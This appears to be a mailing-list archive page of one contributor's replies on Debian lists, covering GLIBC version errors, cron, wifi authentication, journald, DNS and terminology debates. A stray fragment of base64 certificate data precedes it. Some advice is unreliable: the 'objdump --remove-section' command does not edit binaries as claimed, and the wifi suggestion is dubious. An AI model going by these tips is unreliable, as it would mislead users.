xzzDqltvAGVq10MgnLY9rIvZMccRsEVgEAB2ANq2v2s/tbYin5vCu1xr6HCRcWy7
UYSFNL2kPTBI1/urAAABiABkUvIAAAQDAEcwRQIgAtm8xShzPd6lmxA4dGyZzQKa
U6fmBbCDIkyqNnKgOtoCIQCx5g1X5GBvuqkBlQHIYeWQ4UB1tNEtYYN/z3D293Lf
LTANBgkqhkiG9w0BAQsFAAOCAQEARpS7/BX4uVMvOMGfTo92uZNMozhWJzE+5o+k
ARsyf8FPmTNjHs+Z6A+DWTQ/4AAJ+cRv9LJzHpXw4X/o3u6VF5+rma20q7eLupxg

Re: debian-devel wishlist "bugs"

[Jeffrey Walton]

On Fri, Mar 1, 2024 at 12:22 AM Gareth Evans  wrote:
>
> I'm subscribed to debian-devel for entertainment purposes and see regular 
> wishlist "bug" reports, eg.
>
> https://lists.debian.org/debian-devel/2024/02/msg00321.html
>
> Can anyone advise of the appropriate way for non-developers to 
> request/suggest inclusion of packages?

Open a bug report against the wnpp package. See
 and .

> Freenginx doesn't seem to be in testing but might be a worthwhile addition.



Jeff

Re: where are the crontab files in Trixie?

[Jeffrey Walton]

On Tue, Feb 27, 2024 at 2:12 PM Gary Dale  wrote:
>
> On 2024-02-27 10:25, Kushal Kumaran wrote:
> > On Tue, Feb 27 2024 at 10:15:59 AM, Gary Dale  
> > wrote:
> >> [...]
> >> Can anyone explain how Trixie is handling crontabs now?
> > This behavior has existed forever.  I'm on bookworm, though, so no idea
> > if anything is changing in trixie.
> The debian wiki suggests that the handling of cron/anacron is evolving.

That sounds like a euphemism for "being killed off" by Systemd and its timers.

Jeff

Re: How to upgrade the GLIBCXX and GLIBC to the specific version

[Jeffrey Walton]

On Tue, Feb 27, 2024 at 9:28 AM Gremlin  wrote:
>
> On 2/27/24 09:23, Jeffrey Walton wrote:
> > On Tue, Feb 27, 2024 at 8:34 AM Gremlin  
> > wrote:
> >> [...]
> >>> Another option is to rebuild blueriver_bitmap_streamer. Before the
> >>> build, rip out that useless symbol versioning. All that symbol
> >>> versioning does is to cause a DoS and frustrate users.
> >>>
> >>> You can find the ASM directives to rip out the versioning by grepping
> >>> for '.symver'. It will be in an ASM block.
> >>
> >> https://info.semtech.com/blueriver-av-manager
> >>
> >> The source:
> >>
> >> https://semtech.my.salesforce.com/sfc/p/#E000JelG/a/RQ01m7Hx/ptDTNUqlZvD_8F_SbhjtoHaX9jOZ_fKxuauW0cZp5ag?utm_referrer=https%3A%2F%2Finfo.semtech.com%2F
> >>
> >> Unable to Process Request
> >> We couldn't access the content delivery.
> >>
> >> This content has been deleted, doesn't exist, or can't be previewed.
> >>
> >> Gonna be hard to do that
> >
> > OP might then take a look at editing the elf file directly. `objdump
> > --remove-section .symver blueriver_bitmap_streamer` should do the
> > trick.
>
> Why?

The OP wants to run his software.

Surely you have a better question than "Why," but I don't know what it is.

Jeff

Re: How to upgrade the GLIBCXX and GLIBC to the specific version

[Jeffrey Walton]

On Tue, Feb 27, 2024 at 8:34 AM Gremlin  wrote:
>
> On 2/27/24 08:27, Jeffrey Walton wrote:
> > On Tue, Feb 27, 2024 at 5:52 AM Diego Luo （罗国雄）  wrote:
> >>
> >> Would you pls help give tips about how to upgrade the GLIBCXX and GLIBC to 
> >> the specific version (GLIBCXX_3.4.29, GLIBC_2.34) on Debian?
> >>
> >> I am using the Raspberry Pi 4B with the Raspbian OS “Linux raspberrypi 
> >> 5.15.61-v8+ #1579 SMP PREEMPT Fri Aug 26 11:16:44 BST 2022 aarch64 
> >> GNU/Linux”, which is Debian based OS.
> >>
> >> When running a SW I met the problem missing the required versions of 
> >> GLIBCXX and GLIBC, with the details below.
> >>
> >> root@raspberrypi:/home/bitmap_overlap/linux-aarch64# 
> >> ./blueriver_bitmap_streamer
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libstdc++.so.6: 
> >> version `GLIBCXX_3.4.29' not found (required by 
> >> ./blueriver_bitmap_streamer)
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> >> `GLIBC_2.32' not found (required by ./blueriver_bitmap_streamer)
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> >> `GLIBC_2.33' not found (required by ./blueriver_bitmap_streamer)
> >>
> >> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> >> `GLIBC_2.34' not found (required by ./blueriver_bitmap_streamer)
> >>
> >> root@raspberrypi:/home/bitmap_overlap/linux-aarch64#
> >
> > Another option is to rebuild blueriver_bitmap_streamer. Before the
> > build, rip out that useless symbol versioning. All that symbol
> > versioning does is to cause a DoS and frustrate users.
> >
> > You can find the ASM directives to rip out the versioning by grepping
> > for '.symver'. It will be in an ASM block.
>
> https://info.semtech.com/blueriver-av-manager
>
> The source:
>
> https://semtech.my.salesforce.com/sfc/p/#E000JelG/a/RQ01m7Hx/ptDTNUqlZvD_8F_SbhjtoHaX9jOZ_fKxuauW0cZp5ag?utm_referrer=https%3A%2F%2Finfo.semtech.com%2F
>
> Unable to Process Request
> We couldn't access the content delivery.
>
> This content has been deleted, doesn't exist, or can't be previewed.
>
> Gonna be hard to do that

OP might then take a look at editing the elf file directly. `objdump
--remove-section .symver blueriver_bitmap_streamer` should do the
trick.

Jeff

Re: How to upgrade the GLIBCXX and GLIBC to the specific version

[Jeffrey Walton]

On Tue, Feb 27, 2024 at 5:52 AM Diego Luo （罗国雄）  wrote:
>
> Would you pls help give tips about how to upgrade the GLIBCXX and GLIBC to 
> the specific version (GLIBCXX_3.4.29, GLIBC_2.34) on Debian?
>
> I am using the Raspberry Pi 4B with the Raspbian OS “Linux raspberrypi 
> 5.15.61-v8+ #1579 SMP PREEMPT Fri Aug 26 11:16:44 BST 2022 aarch64 
> GNU/Linux”, which is Debian based OS.
>
> When running a SW I met the problem missing the required versions of GLIBCXX 
> and GLIBC, with the details below.
>
> root@raspberrypi:/home/bitmap_overlap/linux-aarch64# 
> ./blueriver_bitmap_streamer
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libstdc++.so.6: version 
> `GLIBCXX_3.4.29' not found (required by ./blueriver_bitmap_streamer)
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> `GLIBC_2.32' not found (required by ./blueriver_bitmap_streamer)
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> `GLIBC_2.33' not found (required by ./blueriver_bitmap_streamer)
>
> ./blueriver_bitmap_streamer: /lib/aarch64-linux-gnu/libc.so.6: version 
> `GLIBC_2.34' not found (required by ./blueriver_bitmap_streamer)
>
> root@raspberrypi:/home/bitmap_overlap/linux-aarch64#

Another option is to rebuild blueriver_bitmap_streamer. Before the
build, rip out that useless symbol versioning. All that symbol
versioning does is to cause a DoS and frustrate users.

You can find the ASM directives to rip out the versioning by grepping
for '.symver'. It will be in an ASM block.

Jeff

Re: medically smart watches

[Jeffrey Walton]

On Mon, Feb 26, 2024 at 2:47 PM hw  wrote:
>
> Well, I was merely hoping that someone might finally have come up with
> a working solution ...

Stop smoking, lose weight, have a healthy diet and exercise.

Jeff

> On Mon, 2024-02-26 at 13:07 +, Andy Smith wrote:
> > Hi,
> >
> > On Mon, Feb 26, 2024 at 12:24:34PM +0100, hw wrote:
> > > How does the watch you got measure blood sugar?  Doesn't that require
> > > a blood sample?
> >
> > Some of them claim to extrapolate it from sweat, others claim to be
> > able to estimate it from shining near-infrared at the blood vessels
> > that are near the surface. Neither method has yet proven to be
> > accurate, which is why they aren't certified as a medical device in
> > UK.
> >
> > You can learn all about it by searching "non-invasive blood glucose
> > monitoring"

Re: Wifi - unable to connect.

[Jeffrey Walton]

On Mon, Feb 26, 2024 at 12:03 PM Grzesiek Sójka  wrote:
>
> Hi there,
>
> I'm trying to connect to wifi at work, unfortunately I get the following:
>
> wlan0: SME: Trying to authenticate with 24:81:3b:2a:0f:e1 (SSID='ssid'
> freq=2412 MHz)
> wlan0: Trying to associate with 24:81:3b:2a:0f:e1 (SSID='ssid' freq=2412
> MHz)
> wlan0: Associated with 24:81:3b:2a:0f:e1
> wlan0: CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
> wlan0: CTRL-EVENT-REGDOM-CHANGE init=COUNTRY_IE type=COUNTRY alpha2=PL
> wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
> wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=26
> wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 26 (MSCHAPV2) selected
> EAP-MSCHAPV2: Authentication succeeded
> wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
> wlan0: PMKSA-CACHE-ADDED 24:81:3b:2a:0f:e1 1
> wlan0: RSN: PMKID mismatch - authentication server may have derived
> different MSK?!
> wlan0: CTRL-EVENT-DISCONNECTED bssid=24:81:3b:2a:0f:e1 reason=1
> locally_generated=1
> BSSID 24:81:3b:2a:0f:e1 ignore list count incremented to 2, ignoring for
> 10 seconds
> wlan0: CTRL-EVENT-DSCP-POLICY clear_all
>
> According to the instruction the settings should be:
> WPA2 Enterprise,
> PEAP,
> MSCHAPv2,
> no certificate.
>
> And my wpa config is:
> network={
>  ssid="ssid"
>  proto=RSN
>  key_mgmt=WPA-EAP
>  pairwise=CCMP
>  auth_alg=OPEN
>  eap=MSCHAPV2
>  identity="uid"
>  password="pas"
>  mesh_fwding=1
> }
>
> Any suggestions?

Not my area of expertise, but...

EAP success tells me you are authenticated using the shared secret or password.

WPA2 Enterprise and MSCHAPv2 look suspicious. I would use WPA2
Personal without MSCHAP and see if it produces a better result.

Jeff

Re: Journald's qualities

[Jeffrey Walton]

On Mon, Feb 26, 2024 at 10:42 AM Mariusz Gronczewski  wrote:
>
> Dnia 2024-02-26, o godz. 13:10:43
> Anssi Saari  napisał(a):
>
> > Mariusz Gronczewski  writes:
> >
> > > Offtopic but since Debian switched to systemd for DNS management on
> > > VPNs and suc I need to restart it sometimes multiple times to just
> > > get "right" DNS servers, because there appears to be no notion of
> > > priority:
> > >
> > > https://github.com/systemd/systemd/issues/27543
> > >
> > > so now any time I connect to work (just openvpn tunnel, nothing
> > > fancy) I need to spam
> > >
> > > systemclt restart systemd-resolved ; sleep 1 ; cat /etc/resolv.conf
> > >
> > > few times till the dice rolls the right order of DNS servers...
> >
> > Interesting. I leaped on systemd-networkd and -resolved when I read
> > years ago it added interface specific DNS support. So now my local DNS
> > (dnsmasq in the router) handles my home network and what goes out via
> > the VPN (i.e. tun0 or wg0 these days) uses the VPN's DNS.
>
> ... in what way? You need to resolve DNS first before you know which
> interface the traffic is going out of.

I _think_ that depends on the configuration. You can use local DNS for
name resolution, or remote (VPN) DNS for name resolution.

Sometimes both are used at the same time. I think that's called "split
DNS" or "split brain DNS."

> > Or if the
> > VPN is off, the local DNS forwards queries to DHCP assigned DNS. I
> > see no issues although I don't have the kind of VPN where some
> > external traffic goes through it only but might work for that too.
> > For me the default was that systemd-resolved dutifully spammed all
> > DNS queries to all DNS servers through all interfaces.
> >
> > This interface specific DNS was a little hard to setup as I
> > recall. Easier with WG than OpenVPN.
> >
>
> Our case is basically that:
>
> * some of the records exist only on VPN DNS server (private domains
>   pointing to private IPs)
> * some of the records exist on outside but the VPN DNS returns private
>   range IP addresses for it (so-called split-horizon DNS).
>
> So the only right way is to ask the first server on the list. That
> worked before systemd-resolved came as Debian scripts just put the
> VPN's DNS servers in the front. Now it is throw of the dice any time
> the daemon is restarted.
>
> The proper way would be either to:
>
> * ask in order, with components registering the DNS server specifying
>   that priority so the daemon can result the sorted list
> * have a way to do per-domain exception and do "if domain is
>   *.internal.example.com, ask VPN server's DNS"
>
> The second is possible in dnsmasq but not (AFAIK) in systemd. And
> currently neither "make systemd a DNS resolver" nor "use
> systemd-resolved provided DNS config" work reliably.

Jeff

Re: Postel's Law (Was Re: Inclusive terminology (instead of master/slave) for network bonding/LACP)

[Jeffrey Walton]

On Sat, Feb 24, 2024 at 7:37 PM Andy Smith  wrote:
>
> [...]
> Turning back more to protocol design, we have spent decades walking
> back Postel's Law as we find more and more ways that being liberal
> in what our software accepts is untenable in the face of a hostile
> Internet.

++. Postel's Law is a disaster nowadays. It was fine back in the
1980's, but it is dangerous in the toxic environments of today.

Here's what we teach our developers: Look for any reason you can to
reject the data. If you can't find a reason, then begrudgingly perform
the processing or transformation.

Jeff

Re: Journald's qualities

[Jeffrey Walton]

On Fri, Feb 23, 2024 at 10:17 PM The Wanderer  wrote:
>
> On 2024-02-23 at 15:35, Stefan Monnier wrote:
>
> >>> but what are the advantages of journald's representation compared
> >>> to a naive one?
> >>
> >> in short: querability without text parsing. That's about it.
> >
> > They have to parse the binary format, so that's not in and of itself
> > an upside compared to parsing CSV.
> >
> > I've made my share of bad design decisions that don't pan out. But
> > there's always an upside to my decision (even when it turns out it
> > speeds up only those cases which can never occur, because of some
> > other aspect of the system).
> >
> > AFAICT the format is *not* just a plain sequence of log entries, so
> > there's some additional structure which is intended to speed up some
> > operations.
> >
> > IOW, even if contrived, there should be *some* use case where it
> > does better than CSV, no?
>
> I can think of two possibilities, just offhand, in no particular order:
>
> * No need to parse the timestamps, et cetera, and take the risk that
> someone put in one that's in a format you don't expect; the times are
> stored internally in a consistent guaranteed format, so you can just use
> internal reader functions (paired with, and updated alongside, the
> internal writer functions) and be done with it.
>
> * No need to worry about handling log entries that *contain* commas, or
> whatever other element was chosen as the separator.

Systemd also provides tamper-resistant logs. The property is often
desirable in the enterprise. See Forward Secure Sealing,
.

Jeff

Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

[Jeffrey Walton]

On Fri, Feb 23, 2024 at 1:13 PM Gremlin  wrote:
>
> On 2/23/24 12:51, Dan Ritter wrote:
> > Jeffrey Walton wrote:
>
> [ >/dev/null ]
>
> >
> > Let's bring it back around to actual action.
> >
> > The possible positions:
> >
> > 1. The terminology is bad, and I'm willing to work on fixing it.
> >
> > 2. The terminology is bad, but I can't work on it myself.
> >
> > 3. The terminology does not bother me, but I don't care if someone else 
> > wants to fix it.
> >
> > 4. The terminology is good and we should not fix it.
> >
> > People taking positions one through three are people that I can
> > work with.
>
> 5. The terminology is good and we should fix it.

If you wish to see how this is going to play out, then visit
<https://github.com/joyent/libuv/pull/1015>. That's the Ben Noordhuis
and Node.js pronoun scandal from 2014.

Jeff

Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

[Jeffrey Walton]

On Thu, Feb 22, 2024 at 5:36 AM Ralph Aichinger  wrote:
>
> I know this is a loaded topic. I really don't want to discuss the
> political aspects of the "why", but just want to know the facts, i.e.
> how far this has been progressed in Debian.
>
> Is there anything planned to get "master/slave" terminology out of
> network bonding/LACP in Debian (or Linux kernel or whoever decides
> this terminology)? I know these things are slow to change, just
> wondering.
>
> https://wiki.debian.org/Bonding

This might be a question that is more appropriate for Debian's
Technical Committee, .

Jeff

Re: Inclusive terminology (instead of master/slave) for network bonding/LACP

[Jeffrey Walton]

On Fri, Feb 23, 2024 at 5:08 AM Marco Moock  wrote:
> Am 22.02.2024 schrieb Ralph Aichinger :
> [...]
> > Is there anything planned to get "master/slave" terminology out of
> > network bonding/LACP in Debian (or Linux kernel or whoever decides
> > this terminology)? I know these things are slow to change, just
> > wondering.
> >
> > https://wiki.debian.org/Bonding
>
> I don't know why somebody should waste time for changing terms there.
> There is almost no technical benefit and the amount of people who
> operate Ethernet bonds is small, so the probability that somebody feels
> disturbed by those terms here is also small.
> [...]
> I don't think that spending time on that is a valuable thing, there are
> more important tasks like testing or adding functionality.

I align with most of this position. An engineer's time is better spent
on technical problems, not political ones. There is no technical
benefit, so don't spend time on it. And there are other venues for
political discourse.

> If you like to change that, feel free to create a fork of the upstream
> projects and use the terms you prefer.

I hope no one would object if OP created a politically correct
ifenslave-pc package.

I don't want to bikeshed, though. Slavery ended in the US about 150
years ago. I don't know any slaves, and I don't own any slaves, so I
don't really have a dog in the fight.

Jeff

Re: Thank you Debian

[Jeffrey Walton]

On Wed, Feb 21, 2024 at 5:47 PM Andre Rodier  wrote:
> [...]
>
> A few years ago, I created a set of Ansible scripts to code what I was
> already doing manually, so I could rebuild my server from scratch.
>
> The solution is on GitHub, and while there was already a plethora of
> existing solutions, none of them implemented everything I wanted and
> needed. It was apparently challenging:
>
> 1. A DNS server included, with DNSSEC implemented, and SSHFP.
> 2. Everything from Debian packages, so upgrade can be automatic.
> 3. No git clone and no zip download for any service.
> 4. The usual LetsEncrypt, but also the extra like CAA, DANE, etc...
> 5. All services should be running under AppArmor.
> 6. No PHP, no RoundCube, NextCloud, OwnCloud, etc please.
> 7. Jabber server, with c2s and s2s.
> 8. CardDAV and CalDAV server.
> 9. WebDAV server.
> 10. LDAP for authentication, not a MySQL database.
> 11. IPv6 support
>
> The points #2 and #3 are particularly interesting. I seriously cannot
> understand why or how people could trust a server exposed on internet,
> without automatic updates from a serious community like Debian. Are they
> suppose to receive alerts from GitHub releases to manually download them
> as they happen ? How can this be done while they are on vacation ?
> Excuse my naive question, if it is, please.
>
> I precise, I am using unattended upgrades, and automatic reboot, and
> never had any issue, thanks to Debian packages quality. I just sometimes
> receive a nice email saying the server rebooted.
>
> This wouldn't have been possible with the Debian community, so, again,
> thank you for that.
>
> We have been happy with this solution, for myself, and a few friends and
> family members, but I would like the opinion from the security experts
> on this list.
>
> - What is the best approach to check if there is any vulnerability in
> the packages configuration ?
> - Is there any service that could audit the deployment code or the
> configuration files ?

You will probably need to stitch together several different solutions,
based on the context. For example, use an Ansible Linter for your
Ansible scripts, .

Jeff